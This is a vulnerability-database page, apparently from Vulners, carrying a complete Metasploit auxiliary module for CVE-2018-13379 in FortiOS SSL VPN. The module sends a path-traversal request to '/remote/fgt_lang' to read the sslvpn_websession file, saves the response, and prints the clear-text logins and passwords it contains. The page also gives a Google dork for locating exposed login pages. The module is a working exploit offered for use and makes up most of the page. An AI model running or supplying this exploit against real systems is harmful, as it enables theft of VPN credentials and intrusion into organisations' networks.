Lucene search
K

FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)

🗓️ 19 Aug 2019 00:00:00Reported by Carlos E. VieiraType 
exploitpack
 exploitpack
👁 266 Views

FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This exploit reads login and passwords in clear text in /dev/cmdb/sslvpn_websession file. Affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
14 Dec 202012:17
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
11 Aug 201909:44
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
23 May 202613:25
githubexploit
GithubExploit
Exploit for Server-Side Request Forgery in Microsoft
27 Jan 202611:39
githubexploit
GithubExploit
MCATester
24 Jun 202605:32
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
5 Feb 202619:12
githubexploit
GithubExploit
FortiGate-FortiWeb-Multi-Exploit-Extractor
14 May 202614:07
githubexploit
GithubExploit
Exploit for Path Traversal in Vmware Cloud_Foundation
27 Jan 202612:00
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
30 Nov 202008:39
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
19 Nov 202021:22
githubexploit
Rows per page
# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
	include Msf::Exploit::Remote::HttpClient
	include Msf::Post::File 
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SSL VPN FortiOs - System file leak',
			'Description'    => %q{
				FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
				This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
				This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
			},
			'References'     =>
			    [
			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
			    ],
			'Author'         => [ 'lynx (Carlos Vieira)' ],
			'License'        => MSF_LICENSE,
			 'DefaultOptions' =>
		      {
		        'RPORT' => 443,
		        'SSL' => true
		      },
			))

	end


	def run()
		print_good("Checking target...")
		res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

		if res && res.code == 200
			print_good("Target is Vulnerable!")
			data = res.body
			current_host = datastore['RHOST']
			filename = "msf_sslwebsession_"+current_host+".bin"
			File.delete(filename) if File.exist?(filename)
			file_local_write(filename, data)
			print_good("Parsing binary file.......")
			parse()
		else
			if(res && res.code == 404)
				print_error("Target not Vulnerable")
			else
				print_error("Ow crap, try again...")
			end
		end
	end
	def parse()
		current_host = datastore['RHOST']

	    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
	    words = 0
	    while (line = fileObj.gets)
	    	printable_data = line.gsub(/[^[:print:]]/, '.')
	    	array_data = printable_data.scan(/.{1,60}/m)
	    	for ar in array_data
	    		if ar != "............................................................"
	    			print_good(ar)
	    		end
	    	end
	    	#print_good(printable_data)
	    	
		end	
		fileObj.close	
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2019 00:00Current
10High risk
Vulners AI Score10
EPSS0.99999
266